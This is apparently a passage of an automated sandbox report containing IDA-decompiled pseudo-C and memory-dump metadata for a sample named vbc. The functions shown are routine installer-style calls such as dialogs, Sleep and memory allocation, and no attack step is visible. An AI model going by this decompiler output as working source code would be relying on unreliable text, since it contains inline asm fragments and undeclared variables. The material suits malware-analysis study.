Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004044AB Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044AB(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x7a8a68, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004044b9
0x004044bf

APIs

SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404498(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x7a1f44, _a4); // executed
				return _t2;
			}

0x004044a2
0x004044a8

APIs

KiUserCallbackDispatcher.NTDLL(?,0040426F), ref: 004044A2

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D

Uniqueness

Uniqueness Score: -1.00%

Function 734F2B98 Relevance: 1.4, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E734F2B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x734f5050 != 0 && E734F2ADB(_a4) == 0) {
					 *0x734f5054 = _t93;
					if( *0x734f504c != 0) {
						_t93 =  *0x734f504c;
					} else {
						E734F30C0(E734F2AD5(), __ecx);
						 *0x734f504c = _t93;
					}
				}
				_t28 = E734F2B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E734F2AFD();
					_t72 = _a4;
					_t79 =  *0x734f5058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x734f5058 = _t72;
					E734F2AF7();
					_t33 = CloseHandle(??); // executed
					 *0x734f5034 = _t33;
					 *0x734f5038 = _t79;
					if( *0x734f5050 != 0 && E734F2ADB( *0x734f5058) == 0) {
						 *0x734f504c = _t94;
						_t94 =  *0x734f5054;
					}
					_t80 =  *0x734f5058;
					_a4 = _t80;
					 *0x734f5058 =  *((intOrPtr*)(E734F2AFD() + _t80));
					_t37 = E734F2AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E734F2B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E734F2B14() + _a4 + _v8);
							_push(E734F2B1E());
							if( *0x734f5050 <= 0 || E734F2ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x734f504c =  *0x734f504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x734f5058;
					if( *0x734f5058 == 0) {
						 *0x734f504c = 0;
					}
					E734F2B42(_t107, _a4,  *0x734f5034,  *0x734f5038);
					return _a4;
				}
				_push(E734F2B14() + _a4);
				_t56 = E734F2B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E734F2B26();
				_t87 = E734F2B22();
				_t90 = E734F2B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x734f2ba8
0x734f2bb9
0x734f2bc6
0x734f2bda
0x734f2bc8
0x734f2bcd
0x734f2bd2
0x734f2bd2
0x734f2bc6
0x734f2be3
0x734f2be8
0x734f2bee
0x734f2c32
0x734f2c32
0x734f2c37
0x734f2c3c
0x734f2c42
0x734f2c44
0x734f2c4a
0x734f2c57
0x734f2c59
0x734f2c5e
0x734f2c6b
0x734f2c7e
0x734f2c84
0x734f2c8a
0x734f2c8b
0x734f2c91
0x734f2c9d
0x734f2ca3
0x734f2cab
0x734f2cac
0x734f2caf
0x734f2cba
0x734f2cbc
0x734f2cc8
0x734f2cce
0x734f2cd6
0x734f2d02
0x734f2d03
0x734f2d05
0x734f2d09
0x734f2d09
0x734f2d10
0x734f2ce6
0x734f2ce6
0x734f2ce7
0x734f2cf5
0x734f2cfe
0x734f2cfe
0x734f2cd6
0x734f2cba
0x734f2d12
0x734f2d19
0x734f2d1b
0x734f2d1b
0x734f2d34
0x734f2d42
0x734f2d42
0x734f2bf9
0x734f2bfa
0x734f2bff
0x734f2c03
0x734f2c08
0x734f2c1c
0x734f2c1d
0x734f2c1e
0x734f2c20
0x734f2c25
0x734f2c27
0x734f2c27
0x734f2c2a
0x734f2c30
0x00000000

APIs

CloseHandle.KERNELBASE(00000000), ref: 734F2C57

Memory Dump Source

Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true

Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e7de7b7b0c7ae93f4be26a83b2215c45bde418c996473e92cb2df22f5216d605
Instruction ID: 3008c4729daa29f1805bfd2638cc72c0db86409091a07e19f0e7cfeae9e7f6e5
Opcode Fuzzy Hash: e7de7b7b0c7ae93f4be26a83b2215c45bde418c996473e92cb2df22f5216d605
Instruction Fuzzy Hash: C641B4BA90030FEFEB1DEF65D840B4937B9EB04310F3C846AE809E6240D6399591CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402c2d
0x00402c39

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
Instruction ID: 3b5dc4dfeaf44569f9deb2ecf0de9c371932af0cf72a0f4646a25a2108455337
Opcode Fuzzy Hash: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
Instruction Fuzzy Hash: E0D05E73A141018BD704EBB8BE8545E73A8EB503193208C37D402E1091EA7888564618

Uniqueness

Uniqueness Score: -1.00%

Function 734F12BB Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E734F12BB() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x734f506c +  *0x734f506c); // executed
				return _t3;
			}

0x734f12c5
0x734f12cb

APIs

GlobalAlloc.KERNELBASE(00000040,?,734F12DB,?,734F137F,00000019,734F11CA,-000000A0), ref: 734F12C5

Memory Dump Source

Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true

Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9abd62e683059c3f883a8de7731000c3b8e241a558b507abbd516b4cd8cf727e
Instruction ID: a5d55a0a2c86de2687b112a5e5bf2a3379e8158191361fea0eaf8438d5e8535e
Opcode Fuzzy Hash: 9abd62e683059c3f883a8de7731000c3b8e241a558b507abbd516b4cd8cf727e
Instruction Fuzzy Hash: 4BB012B2A00001FFEE04AB65CC06F3432D4E700301F1C4040F608F0280C52049208534

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404967 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404967(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0f20; // 0x9f0f84
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B5E(0x3fb, _t146);
					E004067A1(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B5E(0x3fb, _t146);
							if(E00405EF1(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040651A(0x79ff18, _t146);
							_t87 = E004068E7(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040651A(0x79ff18, _t146);
								_t89 = E00405E94(0x79ff18);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79ff18,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79ff18) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79ff18,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E35(0x79ff18);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79ff18) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E04(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != _t158) {
									E00404DEC(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79ff08);
									} else {
										E00404D23(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8b04 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404498(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f38 == _t158) {
									E004048C0();
								}
								 *0x7a1f38 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f48;
							_v60 = E00404CBD;
							_v56 = _t146;
							_v68 = E00406557(_t146, 0x7a1f48, _t167, 0x7a0720, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405DE9(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8a70 + 0x11c));
								if( *((intOrPtr*)( *0x7a8a70 + 0x11c)) != 0 && _t146 == 0x7b3800) {
									E00406557(_t146, 0x7a1f48, _t167, 0, _t125);
									if(lstrcmpiW(0x7a6a00, 0x7a1f48) != 0) {
										lstrcatW(_t146, 0x7a6a00);
									}
								}
								 *0x7a1f38 =  *0x7a1f38 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E60(_t146) != 0 && E00405E94(_t146) == 0) {
						E00405DE9(_t146);
					}
					 *0x7a7a38 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404476(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404476(_t167);
					E004044AB(_t166);
					_t138 = E004068E7(8);
					if(_t138 == 0) {
						L53:
						return E004044DD(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404967
0x0040496d
0x00404973
0x00404980
0x0040498e
0x00404991
0x00404999
0x0040499f
0x0040499f
0x004049ab
0x004049ae
0x00404a1c
0x00404a23
0x00404afa
0x00404b01
0x00404b10
0x00404b10
0x00404b14
0x00404b1e
0x00404b2b
0x00404b2d
0x00404b2d
0x00404b3b
0x00404b42
0x00404b49
0x00404b4c
0x00404b88
0x00404b8a
0x00404b90
0x00404b95
0x00404b99
0x00404b9b
0x00404b9b
0x00404bb7
0x00000000
0x00404bb9
0x00404bbc
0x00404bca
0x00404bd0
0x00404bd1
0x00404bd4
0x00404bd7
0x00000000
0x00404bd7
0x00404b4e
0x00404b50
0x00404b54
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b56
0x00404b56
0x00404b63
0x00404b68
0x00000000
0x00000000
0x00404b6c
0x00404b6e
0x00404b6e
0x00404b77
0x00404b79
0x00404b7e
0x00404b81
0x00404b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b86
0x00404be3
0x00404bed
0x00404bf0
0x00404bf3
0x00404bfa
0x00404bfa
0x00404bfc
0x00404bfc
0x00404c01
0x00404c03
0x00404c0b
0x00404c12
0x00404c14
0x00404c1f
0x00404c1f
0x00404c14
0x00404c2f
0x00404c39
0x00404c41
0x00404c5c
0x00404c43
0x00404c4c
0x00404c4c
0x00404c41
0x00404c61
0x00404c66
0x00404c6b
0x00404c74
0x00404c74
0x00404c7d
0x00404c7f
0x00404c7f
0x00404c8b
0x00404c93
0x00404c9d
0x00404c9d
0x00404ca2
0x00000000
0x00404ca2
0x00404b4c
0x00404b03
0x00404b0a
0x00000000
0x00000000
0x00000000
0x00404b0a
0x00404a29
0x00404a32
0x00404a4c
0x00404a51
0x00404a5b
0x00404a62
0x00404a6e
0x00404a71
0x00404a74
0x00404a7b
0x00404a83
0x00404a86
0x00404a8a
0x00404a91
0x00404a99
0x00404af3
0x00404a9b
0x00404a9c
0x00404aa3
0x00404aad
0x00404ab5
0x00404ac2
0x00404ad6
0x00404ada
0x00404ada
0x00404ad6
0x00404adf
0x00404aec
0x00404aec
0x00404a99
0x00000000
0x00404a51
0x00404a3f
0x00000000
0x00000000
0x00404a45
0x00000000
0x004049b0
0x004049bd
0x004049c6
0x004049d3
0x004049d3
0x004049da
0x004049e0
0x004049e9
0x004049ec
0x004049ef
0x004049f7
0x004049fa
0x004049fd
0x00404a03
0x00404a0a
0x00404a11
0x00404ca8
0x00404cba
0x00404a17
0x00404a1a
0x00000000
0x00404a1a
0x00404a11

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049B6
SetWindowTextW.USER32 ref: 004049E0
SHBrowseForFolderW.SHELL32(?), ref: 00404A91
CoTaskMemFree.OLE32(00000000), ref: 00404A9C
lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 00404ACE
lstrcatW.KERNEL32 ref: 00404ADA
SetDlgItemTextW.USER32 ref: 00404AEC

Part of subcall function 00405B5E: GetDlgItemTextW.USER32 ref: 00405B71

Part of subcall function 004067A1: CharNextW.USER32(?), ref: 00406804
Part of subcall function 004067A1: CharNextW.USER32(?), ref: 00406813
Part of subcall function 004067A1: CharNextW.USER32(?), ref: 00406818
Part of subcall function 004067A1: CharPrevW.USER32(?,?), ref: 0040682B

GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404BAF
MulDiv.KERNEL32 ref: 00404BCA

Part of subcall function 00404D23: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
Part of subcall function 00404D23: wsprintfW.USER32 ref: 00404DCD
Part of subcall function 00404D23: SetDlgItemTextW.USER32 ref: 00404DE0

Strings

A, xrefs: 00404A8A
Call, xrefs: 00404AC8, 00404ACD, 00404AD8

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$Call
API String ID: 2624150263-209694386
Opcode ID: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
Instruction ID: 86dd0b9b094f85dab2cef093751cf510b28304c980c81074e8bd76ad65710a38
Opcode Fuzzy Hash: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
Instruction Fuzzy Hash: 4DA190B1901208ABDB11EFA5CD45AEF77B8EF84314F11803BF601B62D1DB7C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E60( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
